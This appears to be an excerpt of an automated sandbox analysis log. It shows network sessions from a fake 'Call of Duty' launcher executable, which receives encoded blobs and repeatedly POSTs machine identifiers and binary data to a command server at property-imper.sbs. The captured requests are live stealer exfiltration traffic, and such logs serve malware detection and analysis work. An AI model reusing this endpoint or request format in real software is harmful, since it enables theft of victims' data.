                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 75 43 49 4c 43 41 71 44 38 6f 39 33 53 2b 32 55 43 6f 7a 72 69 48 61 34 6e 37 76 6d 30 52 52 41 30 4b 52 47 36 41 63 57 2f 4c 33 78 59 79 65 6f 43 6f 76 43 6d 78 70 33 42 4b 42 66 69 49 4b 49 64 71 47 32 35 73 37 68 4e 48 6a 45 69 48 76 6c 48 6a 71 6f 33 4c 67 61 45 7a 42 57 30 38 71 54 61 33 4f 6c 69 42 71 6f 36 36 78 47 74 4b 4f 62 33 38 41 5a 64 4e 54 46 52 6f 67 2b 6b 74 54 77 77 43 70 37 4a 52 36 32 35 73 35 44 59 39 79 68 51 37 44 33 6a 48 71 55 70 37 2f 32 30 52 42 73 38 4a 42 37 38 52 59 57 2f 50 54 51 49 69 4d 51 4d 76 66 65 76 33 64 76 39 5a 41 6d 70 65 61 78 61 6f 7a 57 68 71 2f 42 6d 47 6a 45 37 55 38 39 4d 69 37 59 77 4b 6b 43 57 68 78 37 79 38 4b 61 51 68 37 74 6d 44 61 4d 72 34 77 69 68 49 2f 50 2f 74 55 34 51 4d 53 63 52 2f 30 69 49 74 6a
                                                                                    Data Ascii: uCILCAqD8o93S+2UCozriHa4n7vm0RRA0KRG6AcW/L3xYyeoCovCmxp3BKBfiIKIdqG25s7hNHjEiHvlHjqo3LgaEzBW08qTa3OliBqo66xGtKOb38AZdNTFRog+ktTwwCp7JR625s5DY9yhQ7D3jHqUp7/20RBs8JB78RYW/PTQIiMQMvfev3dv9ZAmpeaxaozWhq/BmGjE7U89Mi7YwKkCWhx7y8KaQh7tmDaMr4wihI/P/tU4QMScR/0iItj
                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 68 78 37 79 38 4b 61 51 68 37 74 6b 41 61 77 79 36 42 36 6b 4b 75 7a 32 73 30 38 65 50 79 34 62 39 45 69 42 74 44 34 78 42 6f 6e 4f 41 37 66 6c 72 39 6e 54 39 79 68 47 37 44 37 36 57 76 78 74 7a 76 53 6d 53 7a 49 78 4f 42 69 36 55 4d 75 68 64 7a 73 4d 79 5a 46 48 74 66 4b 69 32 39 6e 7a 61 42 71 70 4e 2b 6b 62 72 69 76 67 2f 72 78 4f 48 54 4d 70 46 2f 5a 50 67 72 38 6c 4c 67 57 50 32 77 33 79 75 65 72 58 78 37 73 77 53 4a 6f 70 39 51 75 79 62 39 54 77 76 6b 59 61 4a 47 6b 4f 74 46 62 46 76 7a 74 38 57 4d 6e 43 42 37 37 77 6f 74 62 62 38 32 63 48 70 53 76 6a 46 71 6f 2f 35 76 4f 35 52 68 49 2b 49 42 7a 39 51 6f 36 79 4f 6a 67 48 69 49 6c 4a 38 76 43 79 6b 49 65 37 58 68 69 68 4e 63 77 52 71 43 53 68 37 50 35 52 58 54 55 6c 55 61 49 50 67 62 51 2f 4e 67 2b
                                                                                    Data Ascii: hx7y8KaQh7tkAawy6B6kKuz2s08ePy4b9EiBtD4xBonOA7flr9nT9yhG7D76WvxtzvSmSzIxOBi6UMuhdzsMyZFHtfKi29nzaBqpN+kbrivg/rxOHTMpF/ZPgr8lLgWP2w3yuerXx7swSJop9Quyb9TwvkYaJGkOtFbFvzt8WMnCB77wotbb82cHpSvjFqo/5vO5RhI+IBz9Qo6yOjgHiIlJ8vCykIe7XhihNcwRqCSh7P5RXTUlUaIPgbQ/Ng+
                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 76 43 75 31 74 43 37 4a 6b 69 72 49 61 4a 43 35 41 4c 47 78 76 4a 70 4a 33 49 32 58 2b 4d 50 67 72 52 33 5a 45 43 46 79 67 75 36 2b 4b 7a 5a 30 2f 46 68 41 36 41 79 35 68 61 74 4b 4f 66 79 74 55 30 63 4e 69 55 62 2f 45 79 47 74 7a 67 7a 43 4d 6d 48 52 37 58 76 36 6f 69 66 33 6e 38 44 6f 6a 2b 69 42 65 6f 30 6f 66 53 38 43 45 56 79 4a 52 6a 38 53 59 43 30 4e 6a 6f 49 6a 4d 45 44 73 2f 47 73 30 39 44 2f 62 51 6d 6a 50 65 34 55 72 69 7a 67 2f 37 74 48 46 6a 64 70 58 37 70 49 6e 66 68 76 66 44 47 4b 33 78 43 69 2b 2b 72 50 6b 65 49 6f 44 36 42 35 75 6c 71 6c 50 2b 76 35 76 6b 30 53 4e 79 6f 65 2f 55 4b 44 74 44 30 31 43 49 2f 47 44 71 44 30 70 74 37 59 39 57 51 47 6f 54 50 68 46 2b 52 6a 6f 66 53 6f 43 45 56 79 42 52 62 33 59 59 36 30 4d 48 77 66 78 39 42 48
                                                                                    Data Ascii: vCu1tC7JkirIaJC5ALGxvJpJ3I2X+MPgrR3ZECFygu6+KzZ0/FhA6Ay5hatKOfytU0cNiUb/EyGtzgzCMmHR7Xv6oif3n8Doj+iBeo0ofS8CEVyJRj8SYC0NjoIjMEDs/Gs09D/bQmjPe4Urizg/7tHFjdpX7pInfhvfDGK3xCi++rPkeIoD6B5ulqlP+v5vk0SNyoe/UKDtD01CI/GDqD0pt7Y9WQGoTPhF+RjofSoCEVyBRb3YY60MHwfx9BH
                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 69 66 6f 79 67 2b 71 79 6e 79 47 65 59 63 39 2f 43 6d 51 78 41 2b 61 51 36 30 56 73 57 2f 4f 33 78 59 79 63 38 49 75 2f 53 6c 30 64 62 33 5a 51 32 6c 50 4f 4d 63 6f 43 66 72 38 37 5a 4f 48 44 63 6a 45 76 74 46 6a 4c 38 2f 4f 77 4f 62 69 55 6e 79 38 4c 4b 51 68 37 74 42 44 37 34 33 38 6c 71 37 59 2f 69 7a 74 30 52 64 61 6d 6b 56 38 45 43 42 76 7a 73 36 42 59 2f 45 42 72 33 32 71 74 2f 62 38 47 45 4f 72 54 54 6e 46 36 41 2f 36 2f 69 2f 52 42 51 2b 4a 46 47 30 44 34 4b 67 64 32 52 41 75 4d 51 4a 76 50 43 38 6b 4d 43 31 63 55 69 72 4e 61 4a 43 35 43 7a 74 2f 4c 4e 48 48 6a 45 6f 47 2b 68 64 69 62 45 2f 4f 51 79 43 78 77 47 67 38 61 58 5a 33 50 68 68 44 36 51 31 36 42 6d 6a 62 61 2b 7a 74 31 42 64 61 6d 6b 79 37 56 2b 49 2b 43 68 79 47 63 6e 4f 43 2f 4b 76 36
                                                                                    Data Ascii: ifoyg+qynyGeYc9/CmQxA+aQ60VsW/O3xYyc8Iu/Sl0db3ZQ2lPOMcoCfr87ZOHDcjEvtFjL8/OwObiUny8LKQh7tBD7438lq7Y/izt0RdamkV8ECBvzs6BY/EBr32qt/b8GEOrTTnF6A/6/i/RBQ+JFG0D4Kgd2RAuMQJvPC8kMC1cUirNaJC5Czt/LNHHjEoG+hdibE/OQyCxwGg8aXZ3PhhD6Q16Bmjba+zt1Bdamky7V+I+ChyGcnOC/Kv6
                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 75 42 36 4d 77 36 78 36 73 4c 75 48 33 74 45 38 59 4d 53 55 61 2f 55 79 4b 76 44 34 79 43 59 61 4a 53 66 4c 77 73 70 43 48 75 30 6b 54 72 7a 58 76 57 72 74 6a 2b 4c 4f 33 52 46 31 71 61 52 33 30 53 6f 57 79 4d 54 67 46 6a 38 4d 43 73 76 79 70 33 39 76 39 62 41 65 73 4d 75 73 62 6f 69 6a 72 2b 4c 5a 46 48 6a 51 76 55 62 51 50 67 71 42 33 5a 45 43 70 30 67 71 2b 38 4f 72 50 6b 65 49 6f 44 36 42 35 75 6c 71 76 49 65 58 30 73 45 55 65 4f 69 77 56 38 45 71 46 73 43 55 30 41 49 37 62 46 62 4c 2b 72 39 7a 63 2b 32 77 4f 70 54 2f 68 48 75 52 6a 6f 66 53 6f 43 45 56 79 42 42 33 39 5a 6f 4b 6a 64 79 4e 4f 6b 49 6b 41 76 72 66 79 6b 4e 37 77 59 67 65 68 4f 75 51 5a 72 79 6a 72 38 72 64 41 45 43 41 71 48 76 56 4c 68 62 63 78 4f 67 47 47 7a 77 43 37 39 71 4c 58 6e 37
                                                                                    Data Ascii: uB6Mw6x6sLuH3tE8YMSUa/UyKvD4yCYaJSfLwspCHu0kTrzXvWrtj+LO3RF1qaR30SoWyMTgFj8MCsvyp39v9bAesMusboijr+LZFHjQvUbQPgqB3ZECp0gq+8OrPkeIoD6B5ulqvIeX0sEUeOiwV8EqFsCU0AI7bFbL+r9zc+2wOpT/hHuRjofSoCEVyBB39ZoKjdyNOkIkAvrfykN7wYgehOuQZryjr8rdAECAqHvVLhbcxOgGGzwC79qLXn7
                                                                                    2024-11-23 14:11:42 UTC377INData Raw: 4c 2b 67 64 74 43 72 32 2f 50 41 47 58 54 31 70 53 63 4d 50 6a 4c 38 73 4c 52 61 45 32 51 44 79 79 4f 53 51 78 37 73 77 53 4a 6b 36 37 42 53 6a 4f 2f 43 2b 6c 31 34 58 4e 54 6b 57 37 55 44 46 39 6e 63 36 51 4e 47 61 53 66 4c 7a 75 35 43 48 71 7a 70 54 2b 57 71 31 53 76 59 79 72 2b 72 77 58 6c 31 71 65 31 2b 36 58 63 58 67 64 33 73 44 6d 39 73 42 73 65 47 70 6c 2b 48 46 54 78 4b 68 50 2f 55 4c 6d 68 50 6d 36 62 31 4f 43 69 4e 6c 42 50 6c 42 69 37 38 68 66 45 37 4a 78 6b 66 71 7a 75 71 59 6e 38 51 6d 53 4c 52 35 75 6c 71 52 4c 75 2f 39 74 31 34 4d 66 77 34 4c 39 30 6d 53 71 58 64 79 51 49 2b 4a 58 2b 4b 35 36 74 54 4f 75 7a 42 59 2f 6d 4b 33 53 66 4e 39 73 2b 7a 2b 55 56 30 6b 61 55 6d 6f 41 63 57 71 64 32 52 41 7a 73 6f 56 6f 50 47 70 78 74 79 38 56 6a 61
                                                                                    Data Ascii: L+gdtCr2/PAGXT1pScMPjL8sLRaE2QDyyOSQx7swSJk67BSjO/C+l14XNTkW7UDF9nc6QNGaSfLzu5CHqzpT+Wq1SvYyr+rwXl1qe1+6XcXgd3sDm9sBseGpl+HFTxKhP/ULmhPm6b1OCiNlBPlBi78hfE7JxkfqzuqYn8QmSLR5ulqRLu/9t14Mfw4L90mSqXdyQI+JX+K56tTOuzBY/mK3SfN9s+z+UV0kaUmoAcWqd2RAzsoVoPGpxty8Vja
                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 31 30 34 64 0d 0a 74 37 75 48 34 66 67 57 6a 4d 75 4d 6b 6d 67 50 73 38 72 4e 47 58 77 4d 2f 48 4f 70 4d 67 4c 38 4a 41 67 36 4f 33 51 43 38 38 61 71 51 6b 62 74 6e 53 50 51 41 6f 6c 4c 6b 45 71 2b 7a 71 41 68 46 63 68 77 53 39 45 47 43 72 69 5a 78 49 35 2f 45 43 4c 6e 32 36 70 36 66 2f 53 68 51 2f 48 65 69 48 72 56 74 75 61 50 69 45 30 68 68 66 6b 47 6f 55 4d 75 68 64 79 70 41 30 5a 74 4a 38 75 58 71 69 4a 2b 38 5a 67 57 74 4f 75 77 5a 74 6a 2f 6e 38 4b 5a 4c 57 67 77 58 4d 50 64 45 69 62 55 34 4e 7a 36 33 36 41 71 35 2b 36 66 66 31 4d 56 57 48 61 38 33 37 42 32 79 50 4b 47 39 38 45 64 64 61 68 42 52 73 67 2b 36 39 6e 63 6b 51 4e 47 4a 4d 72 48 35 70 4e 66 4a 36 69 55 70 6f 54 4c 75 46 36 73 6d 6f 62 33 77 54 6c 31 71 65 56 2b 36 53 35 54 34 62 32 78 53
                                                                                    Data Ascii: 104dt7uH4fgWjMuMkmgPs8rNGXwM/HOpMgL8JAg6O3QC88aqQkbtnSPQAolLkEq+zqAhFchwS9EGCriZxI5/ECLn26p6f/ShQ/HeiHrVtuaPiE0hhfkGoUMuhdypA0ZtJ8uXqiJ+8ZgWtOuwZtj/n8KZLWgwXMPdEibU4Nz636Aq5+6ff1MVWHa837B2yPKG98EddahBRsg+69nckQNGJMrH5pNfJ6iUpoTLuF6smob3wTl1qeV+6S5T4b2xS
                                                                                    2024-11-23 14:11:42 UTC1369INData Raw: 7a 63 70 74 62 59 34 57 38 4f 69 68 6d 69 56 4f 51 69 6f 61 75 4a 43 46 56 79 46 6c 2b 36 56 38 58 67 64 77 6b 44 68 38 63 41 70 4f 62 6e 39 63 6a 34 65 41 36 76 65 61 78 61 6f 6d 32 35 6f 2f 34 49 47 53 4e 70 53 61 6f 64 33 75 31 6b 61 31 44 62 31 6b 6d 72 74 37 79 51 68 36 6b 6d 53 4c 35 35 75 6c 72 6a 4c 76 50 68 74 6b 73 4c 4d 57 34 76 78 47 6d 47 71 54 30 64 44 5a 6e 4f 4f 59 7a 69 71 64 37 52 2f 48 34 5a 37 48 65 69 46 65 52 31 32 4c 50 34 42 42 73 78 50 31 48 46 41 63 57 67 64 32 52 41 76 4d 6f 4a 76 50 43 38 77 5a 4c 64 61 78 6d 6d 47 4f 38 4b 6f 32 32 76 73 37 59 49 52 57 46 6e 55 66 35 65 78 65 42 6e 62 6c 76 63 6d 6c 44 69 70 62 57 65 78 72 74 2b 53 50 52 72 72 46 71 32 62 62 6d 7a 39 30 73 50 49 43 38 53 37 45 7a 43 68 67 6b 4a 41 34 66 48 41
                                                                                    Data Ascii: zcptbY4W8OihmiVOQioauJCFVyFl+6V8XgdwkDh8cApObn9cj4eA6veaxaom25o/4IGSNpSaod3u1ka1Db1kmrt7yQh6kmSL55ulrjLvPhtksLMW4vxGmGqT0dDZnOOYziqd7R/H4Z7HeiFeR12LP4BBsxP1HFAcWgd2RAvMoJvPC8wZLdaxmmGO8Ko22vs7YIRWFnUf5exeBnblvcmlDipbWexrt+SPRrrFq2bbmz90sPIC8S7EzChgkJA4fHA


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549706104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:44 UTC274OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=ZK0RYUZ4
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 12779
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:44 UTC12779OUTData Raw: 2d 2d 5a 4b 30 52 59 55 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 37 34 36 44 34 39 37 41 37 45 34 46 34 41 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 5a 4b 30 52 59 55 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 4b 30 52 59 55 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 5a 4b 30 52 59 55 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                    Data Ascii: --ZK0RYUZ4Content-Disposition: form-data; name="hwid"E5746D497A7E4F4AC3D9BBD8FB1FB453--ZK0RYUZ4Content-Disposition: form-data; name="pid"2--ZK0RYUZ4Content-Disposition: form-data; name="lid"BVnUqo--@saschkaq--ZK0RYUZ4Content-Disp
                                                                                    2024-11-23 14:11:45 UTC1020INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=kvck005s3n1kg5k9un5v2n6g6f; expires=Wed, 19-Mar-2025 07:58:23 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fgjLHiaw366t%2BHyb8p%2Bt5tGv7WY5LSUMXa09QC1prlHsDCTSPgptMulbqchauuR3rzU6mnRkkT%2FBrk1xdKT%2Fz4OsYd3xF3l9FFkn3xIiqdvhjf%2Fn97z6btSVq1uTvxLIZ7wwf4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71c00bbf19437a-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13711&delivery_rate=1591280&cwnd=219&unsent_bytes=0&cid=ea2b68ddce4e9462&ts=801&x=0"
                                                                                    2024-11-23 14:11:45 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 14:11:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549707104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:46 UTC280OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=SKZN5Y6S87062K
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 15057
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:46 UTC15057OUTData Raw: 2d 2d 53 4b 5a 4e 35 59 36 53 38 37 30 36 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 37 34 36 44 34 39 37 41 37 45 34 46 34 41 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 53 4b 5a 4e 35 59 36 53 38 37 30 36 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 4b 5a 4e 35 59 36 53 38 37 30 36 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 53 4b 5a 4e
                                                                                    Data Ascii: --SKZN5Y6S87062KContent-Disposition: form-data; name="hwid"E5746D497A7E4F4AC3D9BBD8FB1FB453--SKZN5Y6S87062KContent-Disposition: form-data; name="pid"2--SKZN5Y6S87062KContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--SKZN
                                                                                    2024-11-23 14:11:47 UTC1025INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=7hdolfm7bdkjtcbaupio4g673c; expires=Wed, 19-Mar-2025 07:58:26 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CEYu3tgK2cV2Opfpe5H8W1%2FArSoSi6ZX3qG1%2FKCbQ1n5%2B0qfsXFj39ELrMMnZkXmQCosH31r5%2BuDzvgy9UpZdFf5r9%2BDN6%2FOOy4W0lwcxsY61ti9iuvzZ%2FkTCkWCMFYooPfzvBQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71c018ff5643dd-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15995&delivery_rate=1650650&cwnd=196&unsent_bytes=0&cid=8282efd4982f7d1c&ts=784&x=0"
                                                                                    2024-11-23 14:11:47 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 14:11:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549708104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:48 UTC280OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=A4DH3F0XIZIM96
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20547
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:48 UTC15331OUTData Raw: 2d 2d 41 34 44 48 33 46 30 58 49 5a 49 4d 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 37 34 36 44 34 39 37 41 37 45 34 46 34 41 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 41 34 44 48 33 46 30 58 49 5a 49 4d 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 34 44 48 33 46 30 58 49 5a 49 4d 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 41 34 44 48
                                                                                    Data Ascii: --A4DH3F0XIZIM96Content-Disposition: form-data; name="hwid"E5746D497A7E4F4AC3D9BBD8FB1FB453--A4DH3F0XIZIM96Content-Disposition: form-data; name="pid"3--A4DH3F0XIZIM96Content-Disposition: form-data; name="lid"BVnUqo--@saschkaq--A4DH
                                                                                    2024-11-23 14:11:48 UTC5216OUTData Raw: da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00
                                                                                    Data Ascii: h'F3Wun 4F([:7s~X`nO`i
                                                                                    2024-11-23 14:11:49 UTC1023INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=jeu5ohhi4vq245gp37r2o2h5ad; expires=Wed, 19-Mar-2025 07:58:28 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fu5frwiX5qenA7yZvEvw%2BomNAJPqmxNW%2Bau76lywx9xpOZ4BViRbj%2FkUyA9TNisPEhPpYJ1s5%2BkHmWGFC9kSx4BAGxczwL%2FfbExZzzVAVQvvT7ZxgYeo3DzXQcwbKY%2BX8RidNJY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71c0273b9f8c65-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1883&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21507&delivery_rate=1600877&cwnd=192&unsent_bytes=0&cid=68efab3801779577&ts=850&x=0"
                                                                                    2024-11-23 14:11:49 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 14:11:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.549709104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:51 UTC278OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=VOKUMYZPAHIZ4
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1226
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:51 UTC1226OUTData Raw: 2d 2d 56 4f 4b 55 4d 59 5a 50 41 48 49 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 37 34 36 44 34 39 37 41 37 45 34 46 34 41 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 56 4f 4b 55 4d 59 5a 50 41 48 49 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 4f 4b 55 4d 59 5a 50 41 48 49 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 56 4f 4b 55 4d 59 5a
                                                                                    Data Ascii: --VOKUMYZPAHIZ4Content-Disposition: form-data; name="hwid"E5746D497A7E4F4AC3D9BBD8FB1FB453--VOKUMYZPAHIZ4Content-Disposition: form-data; name="pid"1--VOKUMYZPAHIZ4Content-Disposition: form-data; name="lid"BVnUqo--@saschkaq--VOKUMYZ
                                                                                    2024-11-23 14:11:52 UTC1014INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
